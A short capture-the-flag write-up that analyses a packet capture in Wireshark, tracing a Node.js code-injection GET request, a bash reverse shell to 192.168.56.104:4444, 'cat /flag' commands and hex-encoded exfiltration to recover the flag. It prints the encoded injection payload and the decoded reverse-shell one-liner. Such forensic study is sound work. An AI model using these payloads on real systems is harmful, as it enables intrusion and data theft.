In the files for the challenge there was a pcapng files

Using file shark I started to look at the network traffic and found an odd GET request for the website (103):
   […]GET /?user=exploit%28%29%20%7B%7D%20%26%26%20%28%28%28%29%3D%3E%7B%20global.process.mainModule.require%28%22child_process%22%29.execSync%28%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.104%2F4444%200%3E%261%27%22%2

This can be converted to:
  bash -c 'bash -i >& /dev/tcp/192.168.56.104/4444 0>&1'

From this point I was trying to find where data was leaving to see what was stolen
I found some "cat /flag" commands run when looking in the hex data in wireshark (131/132)

After that I would a packet (136) that was sending a odd string of numbers out

Taking that string of numbers I found out that it was a hexadecimal string

Decoding got me another hex string and decoding that got the flag
